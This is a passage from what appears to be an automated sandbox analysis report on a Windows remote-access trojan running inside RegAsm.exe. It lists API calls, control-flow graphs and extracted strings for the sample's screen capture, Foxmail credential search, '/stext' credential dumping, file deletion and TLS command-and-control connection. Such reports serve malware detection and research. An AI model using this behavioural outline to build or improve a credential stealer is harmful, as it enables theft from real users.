725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                          APIs
                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$ErrorLastLocalTime
                          • String ID: | $%I64u$0o|$5.1.2 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-7B1J99$TLS Off$TLS On $`.|$dMG$hlight$name$NG$NG$PG$PG$PG
                          • API String ID: 524882891-2816713678
                          • Opcode ID: dce4dbc1c9552ef97593c32f0aba4e48013e2fbb171476585201c2d95aca7576
                          • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                          • Opcode Fuzzy Hash: dce4dbc1c9552ef97593c32f0aba4e48013e2fbb171476585201c2d95aca7576
                          • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                          Function 00418EB1 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 971 418eb1-418ef8 CreateDCA CreateCompatibleDC call 419360 974 418efa-418efc 971->974 975 418efe-418f19 call 4193a2 971->975 974->975 977 418f1d-418f1f 974->977 975->977 979 418f71-418f78 call 402093 977->979 980 418f21-418f23 977->980 984 418f7d-418f89 979->984 980->979 981 418f25-418f5c call 4193d8 CreateCompatibleBitmap 980->981 986 418f8a-418f94 SelectObject 981->986 987 418f5e-418f6a DeleteDC * 2 981->987 989 418fa5-418fcc StretchBlt 986->989 990 418f96 986->990 988 418f6b DeleteObject 987->988 988->979 989->990 991 418fce-418fd3 989->991 992 418f97-418fa3 DeleteDC * 2 990->992 993 418fd5-418fea GetCursorInfo 991->993 994 41904f-419057 991->994 992->988 993->994 995 418fec-419000 GetIconInfo 993->995 996 419099-4190ab GetObjectA 994->996 997 419059-419060 994->997 995->994 998 419002-41904b DeleteObject * 2 DrawIcon 995->998 996->990 1001 4190b1-4190c3 996->1001 999 419062-419087 BitBlt 997->999 1000 419089-419096 997->1000 998->994 999->996 1000->996 1002 4190c5-4190c7 1001->1002 1003 4190c9-4190d3 1001->1003 1004 419100 1002->1004 1005 4190d5-4190df 1003->1005 1006 419104-41910d 1003->1006 1004->1006 1005->1006 1008 4190e1-4190eb 1005->1008 1007 41910e-419148 LocalAlloc 1006->1007 1009 419154-41918b GlobalAlloc 1007->1009 1010 41914a-419151 1007->1010 1008->1006 1011 4190ed-4190f3 1008->1011 1012 419196-4191ab GetDIBits 1009->1012 1013 41918d-419191 1009->1013 1010->1009 1014 4190f5-4190fb 1011->1014 1015 4190fd-4190ff 1011->1015 1016 4191d3-41929b call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 1012->1016 1017 4191ad-4191ce DeleteDC * 2 DeleteObject GlobalFree 1012->1017 1013->992 1014->1007 1015->1004 1034 4192a0-4192c4 call 402055 call 401fd8 * 2 1016->1034 1035 41929d-41929e DeleteDC 1016->1035 1017->979 1034->984 1035->1034
                          APIs
                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                          • DeleteDC.GDI32(00000000), ref: 00418F65
                          • DeleteDC.GDI32(00000000), ref: 00418F68
                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                          • GetCursorInfo.USER32(?), ref: 00418FE2
                          • GetIconInfo.USER32 ref: 00418FF8
                          • DeleteObject.GDI32(?), ref: 00419027
                          • DeleteObject.GDI32(?), ref: 00419034
                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                          • DeleteDC.GDI32(?), ref: 004191B7
                          • DeleteDC.GDI32(00000000), ref: 004191BA
                          • DeleteObject.GDI32(00000000), ref: 004191BD
                          • GlobalFree.KERNEL32(?), ref: 004191C8
                          • DeleteObject.GDI32(00000000), ref: 0041927C
                          • GlobalFree.KERNELBASE(?), ref: 00419283
                          • DeleteDC.GDI32(?), ref: 00419293
                          • DeleteDC.GDI32(00000000), ref: 0041929E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                          • String ID: DISPLAY
                          • API String ID: 4256916514-865373369
                          • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                          • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                          • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                          • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                          Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1042 412aef-412b38 GetModuleFileNameW call 4020df * 3 1049 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 1042->1049 1074 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1049->1074 1097 412c66 1074->1097 1098 412c58-412c60 Sleep 1074->1098 1099 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1097->1099 1098->1074 1098->1097 1122 412d08 1099->1122 1123 412cfa-412d02 Sleep 1099->1123 1124 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1122->1124 1123->1099 1123->1122 1147 412daa-412dcf 1124->1147 1148 412d9c-412da4 Sleep 1124->1148 1149 412dd3-412def call 401f04 call 41c516 1147->1149 1148->1124 1148->1147 1154 412df1-412e00 call 401f04 DeleteFileW 1149->1154 1155 412e06-412e22 call 401f04 call 41c516 1149->1155 1154->1155 1162 412e24-412e3d call 401f04 DeleteFileW 1155->1162 1163 412e3f 1155->1163 1165 412e43-412e5f call 401f04 call 41c516 1162->1165 1163->1165 1171 412e61-412e73 call 401f04 DeleteFileW 1165->1171 1172 412e79-412e7b 1165->1172 1171->1172 1174 412e88-412e93 Sleep 1172->1174 1175 412e7d-412e7f 1172->1175 1174->1149 1176 412e99-412eab call 406b63 1174->1176 1175->1174 1178 412e81-412e86 1175->1178 1181 412f01-412f20 call 401f09 * 3 1176->1181 1182 412ead-412ebb call 406b63 1176->1182 1178->1174 1178->1176 1193 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1181->1193 1182->1181 1188 412ebd-412ecb call 406b63 1182->1188 1188->1181 1194 412ecd-412ef9 Sleep call 401f09 * 3 1188->1194 1209 412f63-412f89 call 401f09 call 405b05 1193->1209 1194->1049 1207 412eff 1194->1207 1207->1193 1214 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1209->1214 1215 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1209->1215 1284 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1214->1284 1215->1284
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636A1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                          • String ID: /stext "$0TG$0TG$NG$NG
                          • API String ID: 1223786279-2576077980
                          • Opcode ID: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                          • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                          • Opcode Fuzzy Hash: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                          • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                          Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                          • lstrlenW.KERNEL32(?), ref: 100014C5
                          • lstrlenW.KERNEL32(?), ref: 100014E0
                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                          • String ID: )$Foxmail$ProgramFiles
                          • API String ID: 672098462-2938083778
                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                          Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1357 414dc1-414dfd 1358 414e03-414e18 GetSystemDirectoryA 1357->1358 1359 414f18-414f23 1357->1359 1360 414f0e 1358->1360 1361 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1358->1361 1360->1359 1366 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1361->1366 1367 414e6c-414e76 GetProcAddress 1361->1367 1380 414f0a-414f0d 1366->1380 1381 414ebd-414ec7 GetProcAddress 1366->1381 1368 414e78-414e7b FreeLibrary 1367->1368 1369 414e7d-414e7f 1367->1369 1368->1369 1369->1366 1371 414ed2 1369->1371 1374 414ed4-414ee5 GetProcAddress 1371->1374 1375 414ee7-414eeb 1374->1375 1376 414eef-414ef2 FreeLibrary 1374->1376 1375->1374 1378 414eed 1375->1378 1379 414ef4-414ef6 1376->1379 1378->1379 1379->1380 1382 414ef8-414f08 1379->1382 1380->1360 1383 414ec9-414ecc FreeLibrary 1381->1383 1384 414ece-414ed0 1381->1384 1382->1380 1382->1382 1383->1384 1384->1371 1384->1380
                          APIs
                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                          • API String ID: 2490988753-744132762
                          • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                          • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                          • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                          • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                          Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1385 4048c8-4048e8 connect 1386 404a1b-404a1f 1385->1386 1387 4048ee-4048f1 1385->1387 1390 404a21-404a2f WSAGetLastError 1386->1390 1391 404a97 1386->1391 1388 404a17-404a19 1387->1388 1389 4048f7-4048fa 1387->1389 1392 404a99-404a9e 1388->1392 1393 404926-404930 call 420cf1 1389->1393 1394 4048fc-404923 call 40531e call 402093 call 41b580 1389->1394 1390->1391 1395 404a31-404a34 1390->1395 1391->1392 1407 404941-40494e call 420f20 1393->1407 1408 404932-40493c 1393->1408 1394->1393 1397 404a71-404a76 1395->1397 1398 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1395->1398 1400 404a7b-404a94 call 402093 * 2 call 41b580 1397->1400 1398->1391 1400->1391 1417 404950-404973 call 402093 * 2 call 41b580 1407->1417 1418 404987-404992 call 421ad1 1407->1418 1408->1400 1447 404976-404982 call 420d31 1417->1447 1431 4049c4-4049d1 call 420e97 1418->1431 1432 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1418->1432 1444 4049d3-4049f6 call 402093 * 2 call 41b580 1431->1444 1445 4049f9-404a14 CreateEventW * 2 1431->1445 1432->1447 1444->1445 1445->1388 1447->1391
                          APIs
                          • connect.WS2_32(FFFFFFFF,00D64950,00000010), ref: 004048E0
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                          • WSAGetLastError.WS2_32 ref: 00404A21
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                          • API String ID: 994465650-2151626615
                          • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                          • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                          • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                          • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                          Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                          • CloseHandle.KERNEL32(?), ref: 00404E4C
                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                          • CloseHandle.KERNEL32(?), ref: 00404EBF
                          • CloseHandle.KERNEL32(?), ref: 00404EC4
                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                          • CloseHandle.KERNEL32(?), ref: 00404ED6
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                          • String ID:
                          • API String ID: 3658366068-0
                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                          Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1477 40da6f-40da94 call 401f86 1480 40da9a 1477->1480 1481 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1477->1481 1482 40dae0-40dae7 call 41c048 1480->1482 1483 40daa1-40daa6 1480->1483 1484 40db93-40db98 1480->1484 1485 40dad6-40dadb 1480->1485 1486 40dba9 1480->1486 1487 40db9a-40db9f call 43c11f 1480->1487 1488 40daab-40dab9 call 41b645 call 401f13 1480->1488 1489 40dacc-40dad1 1480->1489 1490 40db8c-40db91 1480->1490 1502 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1482->1502 1503 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1482->1503 1493 40dbae-40dbb3 call 43c11f 1483->1493 1484->1493 1485->1493 1486->1493 1498 40dba4-40dba7 1487->1498 1511 40dabe 1488->1511 1489->1493 1490->1493 1504 40dbb4-40dbb9 call 409092 1493->1504 1498->1486 1498->1504 1516 40dac2-40dac7 call 401f09 1502->1516 1503->1511 1504->1481 1511->1516 1516->1481
                          APIs
                          • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LongNamePath
                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                          • API String ID: 82841172-425784914
                          • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                          • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                          Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1559 44acc9-44ace2 1560 44ace4-44acf4 call 4467e6 1559->1560 1561 44acf8-44acfd 1559->1561 1560->1561 1568 44acf6 1560->1568 1563 44acff-44ad07 1561->1563 1564 44ad0a-44ad2e MultiByteToWideChar 1561->1564 1563->1564 1566 44ad34-44ad40 1564->1566 1567 44aec1-44aed4 call 43502b 1564->1567 1569 44ad94 1566->1569 1570 44ad42-44ad53 1566->1570 1568->1561 1572 44ad96-44ad98 1569->1572 1573 44ad55-44ad64 call 457210 1570->1573 1574 44ad72-44ad83 call 4461b8 1570->1574 1576 44aeb6 1572->1576 1577 44ad9e-44adb1 MultiByteToWideChar 1572->1577 1573->1576 1587 44ad6a-44ad70 1573->1587 1574->1576 1584 44ad89 1574->1584 1581 44aeb8-44aebf call 435ecd 1576->1581 1577->1576 1580 44adb7-44adc9 call 448c33 1577->1580 1589 44adce-44add2 1580->1589 1581->1567 1588 44ad8f-44ad92 1584->1588 1587->1588 1588->1572 1589->1576 1591 44add8-44addf 1589->1591 1592 44ade1-44ade6 1591->1592 1593 44ae19-44ae25 1591->1593 1592->1581 1596 44adec-44adee 1592->1596 1594 44ae27-44ae38 1593->1594 1595 44ae71 1593->1595 1597 44ae53-44ae64 call 4461b8 1594->1597 1598 44ae3a-44ae49 call 457210 1594->1598 1599 44ae73-44ae75 1595->1599 1596->1576 1600 44adf4-44ae0e call 448c33 1596->1600 1604 44aeaf-44aeb5 call 435ecd 1597->1604 1613 44ae66 1597->1613 1598->1604 1611 44ae4b-44ae51 1598->1611 1603 44ae77-44ae90 call 448c33 1599->1603 1599->1604 1600->1581 1615 44ae14 1600->1615 1603->1604 1617 44ae92-44ae99 1603->1617 1604->1576 1616 44ae6c-44ae6f 1611->1616 1613->1616 1615->1576 1616->1599 1618 44aed5-44aedb 1617->1618 1619 44ae9b-44ae9c 1617->1619 1620 44ae9d-44aead WideCharToMultiByte 1618->1620 1619->1620 1620->1604 1621 44aedd-44aee4 call 435ecd 1620->1621 1621->1581
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                          • __freea.LIBCMT ref: 0044AEB0
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • __freea.LIBCMT ref: 0044AEB9
                          • __freea.LIBCMT ref: 0044AEDE
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                          • String ID:
                          • API String ID: 3864826663-0
